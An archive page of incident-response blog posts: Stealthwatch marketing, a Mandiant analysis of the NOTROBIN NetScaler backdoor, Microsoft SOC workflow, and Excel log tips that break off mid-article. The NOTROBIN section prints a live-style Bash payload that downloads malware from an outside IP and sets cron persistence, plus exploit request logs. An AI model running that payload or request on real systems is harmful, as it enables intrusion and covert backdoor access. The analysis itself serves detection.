Category Archives: Incident Response

Time for Some Straight Talk Around Network Traffic Analysis

According to research from the Enterprise Strategy Group, 87% of organizations use Network Traffic Analysis (NTA) tools for threat detection and response today, and 43% say that NTA is a “first line of defense” in case of an attack. Increasing IT complexity is one of the main drivers of NTA adoption: growing infrastructure, the rise of hybrid and multi-cloud deployments, employees accessing the network from any device and any location, and the large number of smart devices (IoT/OT) connecting to the network. At the same time, the attack landscape has evolved as well: use of stolen credentials, threats hiding in encrypted traffic, a rise in nation-state attacks, and more.

Perhaps that’s why there are so many NTA vendors out there today, trying to catch the attention of security practitioners, carrying their “AI and ML” billboards.

Cisco offers an NTA solution as well, but it wasn’t born yesterday. Cisco Stealthwatch has been on the market for more than 17 years. Here are some of the things that make it the market-leading NTA solution:

Broad dataset

Stealthwatch has always relied on network metadata such as NetFlow to feed its analytics. Now, some vendors claim that this way of ingesting telemetry doesn’t give the complete picture and has limitations. That claim reflects their own architecture: they rely on deploying a large number of sensors and probes in the network to capture data. If I were cynical, I’d say the vendors who take this position want you to buy more probes and increase your workload!

We realized very early on that as the network grows exponentially, it’s very difficult (and expensive) to deploy sensors everywhere. And this approach leaves you with a lot of blind spots. That’s why we offer an agentless deployment that uses built-in functionality in your existing network devices. And unlike competitive claims, Stealthwatch doesn’t just rely on NetFlow. For example, it gets user contextual data from Cisco Identity Services Engine (ISE) and also ingests proxy, web, and endpoint data to provide comprehensive visibility. If you do need to investigate the payload, Stealthwatch integrates with major packet capture solutions so you can selectively analyze the malicious traffic pinpointed by Stealthwatch.

Layered analytical approach

Visibility is great, but can be dangerous when it begins to overwhelm your security team. The key is effective analytics to reduce that massive dataset to a few actionable alerts. Stealthwatch uses close to 100 different behavioral models to analyze the telemetry and identify anomalies. These anomalies are further reduced to high-level alerts mapped to the kill-chain such as reconnaissance, command-and-control, data exfiltration and others. Stealthwatch also employs machine learning that uses global threat intelligence powered by Cisco Talos and techniques like supervised and unsupervised learning, statistical modeling, rule mining…I could go on. But I want to talk about the outcomes of analytics within the solution:

  • Stealthwatch processes ~6.7 trillion network sessions each day across ~80 million devices in our customer environments and reduces them to a few critical alerts. In fact, our customers consistently rate more than 90% of the alerts they see in the dashboard as helpful.
  • Stealthwatch can automatically detect and classify devices and their roles on the network, so your security scales automatically with your growing network.
  • Another key outcome of Stealthwatch security analytics is the ability to analyze encrypted traffic to detect threats and ensure compliance, without any decryption, using Encrypted Traffic Analytics. With greater than 80% of web traffic being encrypted [1] and more than 70% of threats in 2020 predicted to use encryption [2], this is a major attack vector, and it’s no longer feasible to rely on decryption-based monitoring.
  • And lastly, instead of throwing out random metrics like “XX times workload reduction”, we asked our customers how Stealthwatch has helped them in their incident response, and 77% agreed that it has reduced the time to detect and remediate threats from months to hours.

Multi-cloud visibility

As organizations increasingly adopt the cloud, they need to ensure that their security controls extend to the cloud as well. Stealthwatch is the only network traffic analysis solution that can provide truly cloud-native visibility across all major cloud providers: Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform (GCP). And again, the deployment is agentless, without the need to install multiple sensors across the infrastructure. With a single solution, you get visibility across the entire network infrastructure, from on-premises to the cloud.

Integrated platform approach

We have been working on integrating Stealthwatch analytics into our security platform that spans the network, endpoint, applications and cloud. Most recently, we have integrated Stealthwatch with Cisco Threat Response. Stealthwatch sends alerts directly to Cisco Threat Response’s Incident Manager feature, allowing users to see those alerts alongside prioritized security alerts from other products such as Firepower devices. These incidents can then be investigated with additional context from your other threat response-enabled technologies, all in one console, with one click. This lowers the time required to triage and respond to these alarms.

Stealthwatch is also integrated with Cisco firewalls through Cisco Defense Orchestrator for threat detection and effective policy management.

Try Stealthwatch

Customers, big and small, love and trust Stealthwatch. We count 15 of the top 20 US banks and 14 of the top 20 global healthcare companies among our customers. If you would like to try the solution, you can sign up for a free 2-week Stealthwatch visibility assessment at: https://www.cisco.com/go/free-visibility-assessment

Joining us at Cisco Live, Barcelona this week? Here’s a guide to all the activities and key sessions related to Stealthwatch at the event, or come check out a Stealthwatch demo within the Security area at the World of Solutions.

  1. As of May 2019, 94% of all Google web traffic is encrypted. And nearly 80% of web pages loaded by Firefox use HTTPS
  2. Gartner predicts that more than 70% of malware campaigns in 2020 will use some type of encryption to conceal malware delivery, command-and-control activity, or data exfiltration – Gartner, Predicts 2017: Network and Gateway Security, December 13, 2016


Cloudy with a Chance of Extremely High Alert Accuracy

You can tell it’s raining by sticking your head out the door, but what’s the likelihood of it stopping in the next hour? What’s the temperature and relative humidity? Suddenly the need for analytics is apparent. Without it, the chance of getting soaked on any given day would dramatically increase.

Analytics makes the world go ‘round. So why shouldn’t it be the same in security? According to our CISO Benchmark Study, only 35% of respondents said it was easy to determine the scope of a compromise, contain it, and remediate it. This is where analytics can come in, helping to turn the tide. Analytics are becoming increasingly critical for security, and when done right, can significantly improve an organization’s risk posture.

With so much at stake, cybersecurity should be seamless, precise, and manageable. Unfortunately, as I elaborated on in my last blog post, that’s not often the case. Organizations have become accustomed to purchasing and using too many security products without having enough people to manage them – resulting in more alerts than can be digested.

Forecast: Advanced Analytics   

We understand the importance of delivering security intelligence that can be easily obtained, understood, and responded to in a timely manner. Seventy-seven percent of our customers say that our industry-leading Network Traffic Analysis (NTA) solution, Cisco Stealthwatch, has reduced their time to detect and remediate threats from months to hours, and has provided a fast return on investment.

Stealthwatch provides enterprise-wide visibility from the private network to the public cloud – including from endpoints and encrypted traffic. It delivers comprehensive situational awareness to help organizations detect, prioritize, and mitigate threats in real time.

Customers Enhance Security with Stealthwatch

The in-depth visibility and robust analytics provided by Stealthwatch translate into high-fidelity alerts, dramatically decreasing the need to manually sift through massive amounts of information to pinpoint a security threat. In fact, our customers consistently rate greater than 90 percent of the alerts they receive from Stealthwatch as “helpful,” meaning they lead to something that definitely needs attention. Minimizing noise and zeroing in on what’s most important is a requirement for effectively protecting today’s complex, modernized environments.

  • According to the Durham County Government, Stealthwatch has increased visibility and detection of internal threats by at least 80% and has reduced incident response time by 90%.
  • According to Dimension Data, Stealthwatch has decreased incident response time by over 100 days.
  • And with Stealthwatch, J. Crew Group can now respond to incidents in 10-15 minutes.

A Platform Approach to Security

Stealthwatch is part of a portfolio of products that work together as a team, learning from each other and improving each other’s effectiveness. For example, Stealthwatch integrates with our incident response portal, Cisco Threat Response, and our security policy management tool, Cisco Defense Orchestrator. We also integrate third-party solutions to deliver more thorough and impactful defenses.

Stealthwatch leverages many aspects of our platform approach to security – including integration, automation, and machine learning – to harden networks and simplify protection. It’s like knowing with confidence what the weather will be like all day and having exactly the right kind of clothes to stay comfortable and dry.

Learn More

If you are joining us this week at Cisco Live in Barcelona, come check out Stealthwatch at one of the sessions or experience a demo within the Security area at the World of Solutions. Or, learn more about Stealthwatch here and take our free 2-week visibility assessment to see how powerful security analytics can quickly surface threats that might be lurking within your network.


404 Exploit Not Found: Vigilante Deploying Mitigation for Citrix NetScaler Vulnerability While Maintaining Backdoor

As noted in Rough Patch: I Promise It'll Be 200 OK, our FireEye Mandiant Incident Response team has been hard at work responding to intrusions stemming from the exploitation of CVE-2019-19781. After analyzing dozens of successful exploitation attempts against Citrix ADCs that did not have the Citrix mitigation steps implemented, we’ve recognized multiple groups of post-exploitation activity. Within these, something caught our eye: one particular threat actor that’s been deploying a previously-unseen payload for which we’ve created the code family NOTROBIN.

Upon gaining access to a vulnerable NetScaler device, this actor cleans up known malware and deploys NOTROBIN to block subsequent exploitation attempts! But all is not as it seems, as NOTROBIN maintains backdoor access for those who know a secret passphrase. FireEye believes that this actor may be quietly collecting access to NetScaler devices for a subsequent campaign.

Initial Compromise

This actor exploits NetScaler devices using CVE-2019-19781 to execute shell commands on the compromised device. They issue an HTTP POST request from a Tor exit node to transmit the payload to the vulnerable newbm.pl CGI script. For example, Figure 1 shows a web server access log entry recording exploitation:

127.0.0.2 - - [12/Jan/2020:21:55:19 -0500] "POST
/vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 304 - "-" "curl/7.67.0"

Figure 1: Web log showing exploitation
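At triage scale, entries like the one in Figure 1 can be carved out of web access logs programmatically. The following is a minimal sketch of our own (not a FireEye tool) that flags POST requests using the /vpn/../vpns/ traversal to reach the vulnerable CGI scripts; the log path argument and the combined-log format are assumptions based on the example entry above.

import re
import sys

# Matches exploitation attempts like Figure 1: a POST that reaches a perl
# script under /vpns/portal/scripts/ via directory traversal
PATTERN = re.compile(r'"POST\s+\S*/\.\./vpns/portal/scripts/\S+\.pl')

def scan(log_path):
    """Print access-log lines consistent with CVE-2019-19781 exploitation."""
    with open(log_path, errors="replace") as f:
        for line in f:
            if PATTERN.search(line):
                print(line.rstrip())

if __name__ == "__main__":
    scan(sys.argv[1])  # e.g., python scan_logs.py access.log (hypothetical path)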

Unlike other actors, this actor appears to exploit devices using a single HTTP POST request that results in an HTTP 304 response—there is no observed HTTP GET to invoke staged commands. Unfortunately, we haven’t recovered the POST body contents to see how it works. In any case, exploitation causes the Bash one-liner shown in Figure 2 to run on the compromised system:

pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k
hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o
/tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo "* * * * *
/var/nstmp/.nscache/httpd" | crontab -; /tmp/.init/httpd &"

Figure 2: Bash exploit payload

This is the same methodology as described in Rough Patch: I Promise It'll Be 200 OK. The effects of this series of commands include:

  1. Kills and deletes all running instances of netscalerd—a common process name used for cryptocurrency mining utilities deployed to NetScaler devices.
  2. Creates a hidden staging directory /tmp/.init, downloads NOTROBIN to it, and enables the execute permission.
  3. Installs /var/nstmp/.nscache/httpd for persistence via the cron daemon. This is the path to which NOTROBIN will copy itself.
  4. Manually executes NOTROBIN.

There’s a lot to unpack here. Of note, the actor removes malware known to target NetScaler devices via the CVE-2019-19781 vulnerability. Cryptocurrency miners are generally easy to identify—just look for the process utilizing nearly 100% of the CPU. By uninstalling these unwanted utilities, the actor may hope that administrators overlook an obvious compromise of their NetScaler devices.

The actor uses curl to fetch NOTROBIN from the hosting server with IP address 95.179.163[.]186, which appears to host an abandoned WordPress site. FireEye has identified many payloads hosted on this server, each named after their embedded authentication key. Interestingly, we haven’t seen reuse of the same payload across multiple clients. Compartmentalizing payloads indicates the actor is exercising operational security.

FireEye has recovered cron syslog entries, such as those shown in Figure 3, that confirm the persistent installation of NOTROBIN. Note that these entries appear just after the initial compromise. This is a robust indicator of compromise to triage NetScaler devices.

Jan 12 21:57:00 <cron.info> foo.netscaler /usr/sbin/cron[73531]:
(nobody) CMD (/var/nstmp/.nscache/httpd)

Figure 3: cron log entry showing NOTROBIN execution

Now, let’s turn our attention to what NOTROBIN does.

Analysis of NOTROBIN

NOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically scans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to block exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that NOTROBIN provides backdoor access to the compromised system.

When executed, NOTROBIN ensures that it is running from the path /var/nstmp/.nscache/httpd. If not, the utility copies itself to this path, spawns the new copy, and then exits itself. This provides detection cover by migrating the process from /tmp/, a suspicious place for long-running processes to execute, to an apparently NetScaler-related, hidden directory.

Now the fun begins: it spawns two routines that periodically check for and delete exploits.

Every second, NOTROBIN searches the directory /netscaler/portal/scripts/ for entries created within the last 14 days and deletes them, unless the filename or file content contains a hardcoded key (example: 64d4c2d3ee56af4f4ca8171556d50faa). Open source reporting indicates that some actors write scripts into this directory after exploiting CVE-2019-19781. Therefore, we believe that this routine cleans the system of publicly known payloads, such as PersonalBookmark.pl.

Eight times per second, NOTROBIN searches for files with an .xml extension in the directory /netscaler/portal/templates/. This is the directory into which exploits for CVE-2019-19781 write templates containing attacker commands. NOTROBIN deletes files that contain either of the strings block or BLOCK, which likely match potential exploit code, such as that found in the ProjectZeroIndia exploit; however, the utility does not delete files with a filename containing the secret key.
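Pulling those two routines together, here is a rough Python re-implementation of the deletion logic as described above. It is an illustration of the observed behavior, not NOTROBIN’s actual Go code; the key is the example value quoted earlier, and the one-second and eighth-of-a-second timing loops are omitted.

import os
import time

KEY = "64d4c2d3ee56af4f4ca8171556d50faa"  # example key from a recovered sample
SCRIPTS_DIR = "/netscaler/portal/scripts/"
TEMPLATES_DIR = "/netscaler/portal/templates/"
FOURTEEN_DAYS = 14 * 24 * 60 * 60

def clean_scripts():
    """Run every second: delete scripts created within the last 14 days,
    unless the filename or file content contains the key."""
    now = time.time()
    for name in os.listdir(SCRIPTS_DIR):
        path = os.path.join(SCRIPTS_DIR, name)
        if not os.path.isfile(path) or KEY in name:
            continue
        if now - os.path.getctime(path) > FOURTEEN_DAYS:
            continue  # only recently created entries are targeted
        with open(path, errors="replace") as f:
            if KEY in f.read():
                continue
        os.remove(path)

def clean_templates():
    """Run eight times per second: delete .xml templates containing
    'block' or 'BLOCK', sparing filenames that contain the key."""
    for name in os.listdir(TEMPLATES_DIR):
        if not name.endswith(".xml") or KEY in name:
            continue
        path = os.path.join(TEMPLATES_DIR, name)
        with open(path, errors="replace") as f:
            data = f.read()
        if "block" in data or "BLOCK" in data:
            os.remove(path)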

FireEye believes that actors deploy NOTROBIN to block exploitation of the CVE-2019-19781 vulnerability while maintaining backdoor access to compromised NetScaler devices. The mitigation works by deleting staged exploit code found within NetScaler templates before it can be invoked. However, when the actor provides the hardcoded key during subsequent exploitation, NOTROBIN does not remove the payload. This lets the actor regain access to the vulnerable device at a later time.

Across multiple investigations, FireEye observed actors deploying NOTROBIN with unique keys. For example, we’ve recovered nearly 100 keys from different binaries. These look like MD5 hashes, though FireEye has been unsuccessful in recovering any plaintext. Using complex, unique keys makes it difficult for third parties, such as competing attackers or FireEye, to easily scan for NetScaler devices “protected” by NOTROBIN. This actor follows a strong password policy!

Based on strings found within NOTROBIN, the actor appears to inject the key into the Go project using source code files named after the key. Figure 4 and Figure 5 show examples of these filenames.

/tmp/b/.tmpl_ci/64d4c2d3ee56af4f4ca8171556d50faa.go

Figure 4: Source filename recovered from NOTROBIN sample

/root/backup/sources/d474a8de77902851f96a3b7aa2dcbb8e.go

Figure 5: Source filename recovered from NOTROBIN sample

We wonder if “tmpl_ci” refers to a Continuous Integration setup that applies source code templating to inject keys and build NOTROBIN variants. We also hope the actor didn’t have to revert to backups after losing the original source!

Outstanding Questions

NOTROBIN spawns a background routine that listens on UDP port 18634 and receives data; however, it drops the data without inspecting it. You can see this logic in Figure 6. FireEye has not uncovered a purpose for this behavior, though DCSO makes a strong case for this being used as a mutex, as only a single listener can be active on this port.


Figure 6: NOTROBIN logic that drops UDP traffic

There is also an empty function main.install_cron whose implementation has been removed; alternatively, perhaps these are vestiges of an early version of NOTROBIN. In any case, a NetScaler device listening on UDP port 18634 is a reliable indicator of compromise. Figure 7 shows an example of listing the open file handles on a compromised NetScaler device, including a socket listening on UDP 18634.


Figure 7: File handle listing of a compromised NetScaler device
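Since only one process can bind UDP port 18634 at a time, one quick triage idea (our sketch, relying on the mutex hypothesis above) is to attempt to bind the port locally: a failure to bind on a NetScaler device is consistent with a resident NOTROBIN listener.

import socket

def udp_port_in_use(port=18634):
    """Return True if something is already bound to the UDP port, which on
    a NetScaler device is a strong NOTROBIN indicator."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.bind(("0.0.0.0", port))
    except OSError:
        return True  # bind failed: another listener owns the port
    finally:
        s.close()
    return False

if __name__ == "__main__":
    print("UDP 18634 in use:", udp_port_in_use())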

NOTROBIN Efficacy

During one engagement, FireEye reviewed forensic evidence of NetScaler exploitation attempts against a single device, both before and after NOTROBIN was deployed by an actor. Prior to January 12, before NOTROBIN was installed, we identified successful attacks from multiple actors. But, across the following three days, more than a dozen exploitation attempts were thwarted by NOTROBIN. In other words, NOTROBIN inoculated the vulnerable device from further compromise. For example, Figure 8 shows a log message that records a failed exploitation attempt.

127.0.0.2 - - [13/Jan/2020:05:09:07 -0500] "GET
/vpn/../vpns/portal/wTyaINaDVPaw8rmh.xml HTTP/1.1" 404 48 "-"
"curl/7.47.0"

Figure 8: Web log entry showing a failed exploitation attempt

Note that the application server responded with HTTP 404 (“Not Found”) as this actor attempts to invoke their payload staged in the template wTyaINaDVPaw8rmh.xml. NOTROBIN deleted the malicious template shortly after it was created – and before it could be used by the other actor.

FireEye has not yet identified if the actor has returned to NOTROBIN backdoors.

Conclusion

FireEye believes that the actor behind NOTROBIN has been opportunistically compromising NetScaler devices, possibly to prepare for an upcoming campaign. They remove other known malware, potentially to avoid detection by administrators that check into their devices after reading Citrix security bulletin CTX267027. NOTROBIN mitigates CVE-2019-19781 on compromised devices but retains a backdoor for an actor with a secret key. While we haven’t seen the actor return, we’re skeptical that they will remain a Robin Hood character protecting the internet from the shadows.

Indicators of Compromise and Discovery

Table 1 lists indicators that match NOTROBIN variants that FireEye has identified. The domain vilarunners[.]cat is the WordPress site that hosted NOTROBIN payloads. The domain resolved to 95.179.163[.]186 during the time of observed activity. As of January 15, the vilarunners[.]cat domain resolves to a new IP address of 80.240.31[.]218.

IOC Item            Value
HTTP URL prefix     hxxps://95[.]179.163.186/wp-content/uploads/2018/09/
Directory           /var/nstmp/.nscache
Filename            /var/nstmp/.nscache/httpd
Directory           /tmp/.init
Filename            /tmp/.init/httpd
Crontab entry       /var/nstmp/.nscache/httpd
Listening UDP port  18634
Remote IP           95.179.163[.]186
Remote IP           80.240.31[.]218
Domain              vilarunners[.]cat

Table 1: Indicators of Compromise

Discovery on VirusTotal

You can use the following VTI queries to identify NOTROBIN variants on VirusTotal:

  • vhash:"73cee1e8e1c3265c8f836516c53ae042"
  • vhash:"e57a7713cdf89a2f72c6526549d22987"

Note, the vHash implementation is private, so we’re not able to confirm why this technique works. In practice, the vHashes cover the same variants identified by the Yara rule listed in Figure 9.

rule NOTROBIN
{
    meta:
        author = "william.ballenthin@fireeye.com"
        date_created = "2020-01-15"

    strings:
        $func_name_1 = "main.remove_bds"
        $func_name_2 = "main.xrun"

    condition:
        all of them
}

Figure 9: Yara rule that matches on NOTROBIN variants

Recovered Authentication Keys

FireEye has identified nearly 100 hardcoded keys from NOTROBIN variants that the actor could use to re-enter compromised environments. We expect that these strings may be found within subsequent exploitation attempts, either as filenames or payload content. Although we won’t publish them here out of concern for our customers, please reach out if you’re looking for NOTROBIN within your environment and we can provide a list.

Acknowledgements

Thank you to analysts across FireEye that are currently responding to this activity, including Brandan Schondorfer for collecting and interpreting artifacts, Steven Miller for coordinating analysis, Evan Reese for pivoting across intel leads, Chris Glyer for reviewing technical aspects, Moritz Raabe for reverse engineering NOTROBIN samples, and Ashley Frazer for refining the presentation and conclusions.

CISO series: Lessons learned from the Microsoft SOC—Part 3b: A day in the life

The Lessons learned from the Microsoft SOC blog series is designed to share our approach and experience with security operations center (SOC) operations. We share strategies and learnings from our SOC, which protects Microsoft, and our Detection and Response Team (DART), who helps our customers address security incidents. For a visual depiction of our SOC philosophy, download our Minutes Matter poster.

For the next two installments in the series, we’ll take you on a virtual shadow session of a SOC analyst, so you can see how we use security technology. You’ll get to virtually experience a day in the life of these professionals and see how Microsoft security tools support the processes and metrics we discussed earlier. We’ll primarily focus on the experience of the Investigation team (Tier 2) as the Triage team (Tier 1) is a streamlined subset of this process. Threat hunting will be covered separately.


General impressions

Newcomers to the facility often remark on how calm and quiet our SOC physical space is. It looks and sounds like a “normal” office with people going about their job in a calm professional manner. This is in sharp contrast to the dramatic moments in TV shows that use operations centers to build tension/drama in a noisy space.

Nature doesn’t have edges

We have learned that the real world is often “messy” and unpredictable, and the SOC tends to reflect that reality. What comes into the SOC doesn’t always fit into the nice neat boxes, but a lot of it follows predictable patterns that have been forged into standard processes, automation, and (in many cases) features of Microsoft tooling.

Routine front door incidents

The most common attack patterns we see are phishing and stolen credentials attacks (or minor variations on them):

  • Phishing email → Host infection → Identity pivot
  • Stolen credentials → Identity pivot → Host infection

While these aren’t the only ways attackers gain access to organizations, they’re the most prevalent methods mastered by most attackers. Just as martial artists start by mastering basic common blocks, punches, and kicks, SOC analysts and teams must build a strong foundation by learning to respond rapidly to these common attack methods.

As we mentioned earlier in the series, it has been over two years since network-based detection was our primary method for detecting attacks. We attribute this primarily to investments that improved our ability to rapidly remediate attacks early with host/email/identity detections. There are also fundamental challenges with network-based detections: they are noisy and have limited native context for filtering true vs. false positives.

Analyst investigation process

Once an analyst settles into the analyst pod on the watch floor for their shift, they start checking the queue of our case management system for incidents (not entirely unlike how phone support or help desk analysts work).

While anything might show up in the queue, the process for investigating common front door incidents includes:

  1. Alert appears in the queue—After a threat detection tool detects a likely attack, an incident is automatically created in our case management system. The Mean Time to Acknowledge (MTTA) measurement of SOC responsiveness begins with this timestamp. See Part 1: Organization for more information on key SOC metrics.

Basic threat hunting helps keep a queue clean and tidy

Require a 90 percent true positive rate for alert sources (e.g., detection tools and types) before allowing them to generate incidents in the analyst queue. This quality requirement reduces the volume of false positive alerts, which can lead to frustration and wasted time. To implement, you’ll need to measure and refine the quality of alert sources and create a basic threat hunting process. A basic threat hunting process leverages experienced analysts to comb through alert sources that don’t meet this quality bar to identify interesting alerts that are worth investigating. This review (without requiring full investigation of each one) helps ensure that real incident detections are not lost in the high volume of noisy alerts. It can be a simple part time process, but it does require skilled analysts that can apply their experience to the task.

  2. Own and orient—The analyst on shift begins by taking ownership of the case and reading through the information available in the case management tool. This timestamp ends the MTTA responsiveness measurement and begins the Mean Time to Remediate (MTTR) measurement.
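As a toy illustration of how these two metrics fall out of the timestamps described above (this is our sketch, not Microsoft’s tooling), assume each incident record carries a created, acknowledged, and remediated time:

from datetime import datetime

# Hypothetical incident records: (created, acknowledged, remediated)
incidents = [
    ("2020-01-20 09:00", "2020-01-20 09:04", "2020-01-20 11:30"),
    ("2020-01-20 13:10", "2020-01-20 13:21", "2020-01-21 08:45"),
]

def parse(ts):
    return datetime.strptime(ts, "%Y-%m-%d %H:%M")

def mean_minutes(deltas):
    return sum(d.total_seconds() for d in deltas) / len(deltas) / 60

# MTTA: incident creation -> analyst takes ownership
mtta = mean_minutes([parse(a) - parse(c) for c, a, _ in incidents])
# MTTR: analyst takes ownership -> incident remediated
mttr = mean_minutes([parse(r) - parse(a) for _, a, r in incidents])

print(f"MTTA: {mtta:.1f} minutes, MTTR: {mttr:.1f} minutes")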

Experience matters

A SOC is dependent on the knowledge, skills, and expertise of the analysts on the team. The attack operators and malware authors you defend against are often adaptable and skilled humans, so no prescriptive textbook or playbook on response will stay current for very long. We work hard to take good care of our people—giving them time to decompress and learn, recruiting them from diverse backgrounds that can bring fresh perspectives, and creating a career path and shadowing programs that encourage them to learn and grow.

  3. Check out the host—Typically, the first priority is to identify affected endpoints so analysts can rapidly get deep insight. Our SOC relies on the Endpoint Detection and Response (EDR) functionality in Microsoft Defender Advanced Threat Protection (ATP) for this.

Why endpoint is important

Our analysts have a strong preference to start with the endpoint because:

  • Endpoints are involved in most attacks—Malware on an endpoint represents the sole delivery vehicle of most commodity attacks, and most attack operators still rely on malware on at least one endpoint to achieve their objective. We’ve also found the EDR capabilities detect advanced attackers that are “living off the land” (using tools deployed by the enterprise to navigate). The EDR functionality in Microsoft Defender ATP provides visibility into normal behavior that helps detect unusual command lines and process creation events.
  • Endpoint offers powerful insights—Malware and its behavior (whether automated or manual actions) on the endpoint often provides rich detailed insight into the attacker’s identity, skills, capabilities, and intentions, so it’s a key element that our analysts always check for.

Identifying the endpoints affected by this incident is easy for alerts raised by the Microsoft Defender ATP EDR, but may take a few pivots on an email or identity sourced alert, which makes integration between these tools crucial.

  4. Scope out and fill in the timeline—The analyst then builds a full picture and timeline of the related chain of events that led to the alert (which may be an adversary’s attack operation or a false alarm) by following leads from the first host alert. The analyst travels along the timeline:
  • Backward in time—Track backward to identify the entry point in the environment.
  • Forward in time—Follow leads to any devices/assets an attacker may have accessed (or attempted to access).

Our analysts typically build this picture using the MITRE ATT&CK™ model (though some also adhere to the classic Lockheed Martin Cyber Kill Chain®).

True or false? Art or science?

The process of investigation is partly a science and partly an art. The analyst is ultimately building a storyline of what happened to determine whether this chain of events is the result of a malicious actor (often attempting to mask their actions/nature), a normal business/technical process, an innocent mistake, or something else.

This investigation is a repetitive process. Analysts identify potential leads based on the information in the original report, follow those leads, and evaluate if the results contribute to the investigation.

Analysts often contact users to determine whether they performed an anomalous action intentionally or accidentally, or whether the action was performed by someone else entirely.

Running down the leads with automation

Much like analyzing physical evidence in a criminal investigation, cybersecurity investigations involve iteratively digging through potential evidence, which can be tedious work. Another parallel between cybersecurity and traditional forensic investigations is that popular TV and movie depictions are often much more exciting and faster than the real world.

One significant advantage of investigating cyberattacks is that the relevant data is already electronic, making it easier to automate investigation. For many incidents, our SOC takes advantage of security orchestration, automation, and response (SOAR) technology to automate investigation (and remediation) of routine incidents. Our SOC relies heavily on the AutoIR functionality in Microsoft Threat Protection tools like Microsoft Defender ATP and Office 365 ATP to reduce analyst workload. In our current configuration, some remediations are fully automatic and some are semi-automatic (where analysts review the automated investigations and propose remediation before approving execution of it).

Document, document, document

As the analyst builds this understanding, they must capture a complete record with their conclusions and reasoning/evidence for future use (case reviews, analyst self-education, re-opening cases that are later linked to active attacks, etc.).

As our analyst develops information on an incident, they capture the common, most relevant details quickly into the case such as:

  • Alert info: Alert links and Alert timeline
  • Machine info: Name and ID
  • User info
  • Event info
  • Detection source
  • Download source
  • File creation info
  • Process creation
  • Installation/Persistence method(s)
  • Network communication
  • Dropped files

Fusion and integration avoid wasting analyst time

Each minute an analyst wastes on manual effort is another minute the attacker has to spread, infect, and do damage during an attack operation. Repetitive manual activity also creates analyst toil, increases frustration, and can drive interest in finding a new job or career.

We learned that several technologies are key to reducing toil (in addition to automation):

  • Fusion—Adversary attack operations frequently trip multiple alerts in multiple tools, and these must be correlated and linked to avoid duplication of effort. Our SOC has found significant value from technologies that automatically find and fuse these alerts together into a single incident. Azure Security Center and Microsoft Threat Protection include these natively.
  • Integration—Few things are more frustrating and time consuming than having to switch consoles and tools to follow a lead (a.k.a., swivel chair analytics). Switching consoles interrupts their thought process and often requires manual tasks to copy/paste information between tools to continue their work. Our analysts are extremely appreciative of the work our engineering teams have done to bring threat intelligence natively into Microsoft’s threat detection tools and link together the consoles for Microsoft Defender ATP, Office 365 ATP, and Azure ATP. They’re also looking forward to (and starting to test) the Microsoft Threat Protection Console and Azure Sentinel updates that will continue to reduce the swivel chair analytics.

Stay tuned for the next segment in the series, where we’ll conclude our investigation, remediate the incident, and take part in some continuous improvement activities.

Learn more

In the meantime, bookmark the Security blog to keep up with our expert coverage on security matters and follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

To learn more about SOCs, read the previous posts in the Lessons learned from the Microsoft SOC series.

Watch the CISO Spotlight Series: Passwordless: What’s It Worth.

Also, see our full CISO series and download our Minutes Matter poster for a visual depiction of our SOC philosophy.


Norsk Hydro responds to ransomware attack with transparency

Last March, aluminum supplier Norsk Hydro was attacked by LockerGoga, a form of ransomware. The attack began with an infected email and locked the files on thousands of servers and PCs. All 35,000 Norsk Hydro employees across 40 countries were affected. In the throes of this crisis, executives made three swift decisions:

  • Pay no ransom.
  • Summon Microsoft’s cybersecurity team to help restore operations.
  • Communicate openly about the breach.

Read Hackers hit Norsk Hydro with ransomware to learn why this approach helped the company recover and get back to business as usual.


Excelerating Analysis – Tips and Tricks to Analyze Data with Microsoft Excel

Incident response investigations don’t always involve standard host-based artifacts with fully developed parsing and analysis tools. At FireEye Mandiant, we frequently encounter incidents that involve a number of systems and solutions that utilize custom logging or artifact data. Determining what happened in an incident involves taking a dive into whatever type of data we are presented with, learning about it, and developing an efficient way to analyze the important evidence.

One of the most effective tools to perform this type of analysis is one that is in almost everyone’s toolkit: Microsoft Excel. In this article we will detail some tips and tricks with Excel to perform analysis when presented with any type of data.

Summarizing Verbose Artifacts

Tools such as FireEye Redline include handy timeline features to combine multiple artifact types into one concise timeline. When we use individual parsers or custom artifact formats, it may be tricky to view multiple types of data in the same view. Normalizing artifact data with Excel to a specific set of easy-to-use columns makes for a smooth combination of different artifact types.

Consider trying to review parsed file system, event log, and Registry data in the same view using the following data.

Parsed file system record:

   $SI Created:      2019-10-14 23:13:04
   $SI Modified:     2019-10-14 23:33:45
   File Name:        Default.rdp
   File Path:        C:\Users\attacker\Documents\
   File Size:        485
   File MD5:         c482e563df19a401941c99888ac2f525
   File Attributes:  Archive
   File Deleted:     FALSE

Event log record:

   Event Gen Time:   2019-10-14 23:13:06
   Event ID:         4648
   Event Message:    A logon was attempted using explicit credentials.
                     Subject:
                        Security ID:  DomainCorp\Administrator
                        Account Name:  Administrator
                        Account Domain:  DomainCorp
                        Logon ID:  0x1b38fe
                        Logon GUID:  {00000000-0000-0000-0000-000000000000}
                     Account Whose Credentials Were Used:
                        Account Name:  VictimUser
                        Account Domain:  DomainCorp
                        Logon GUID:  {00000000-0000-0000-0000-000000000000}
                     Target Server:
                        Target Server Name: DestinationServer
                        Additional Information:
                     Process Information:
                        Process ID:  0x5ac
                        Process Name:  C:\Program Files\Internet Explorer\iexplore.exe
                     Network Information:
                        Network Address: -
                        Port:   -
   Event Category:   Logon
   Event User:       Administrator
   Event System:     SourceSystem

Registry record:

   KeyModified:      2019-10-14 23:33:46
   Key Path:         HKEY_USER\Software\Microsoft\Terminal Server Client\Servers\
   KeyName:          DestinationServer
   ValueName:        UsernameHInt
   ValueText:        VictimUser
   Type:             REG_SZ

Since these raw artifact data sets have different column headings and data types, they would be difficult to review in one timeline. If we format the data using Excel string concatenation, we can make the data easy to combine into a single timeline view. To format the data, we can use the “&” operator in a formula to join the information we need into a single “Summary” field.

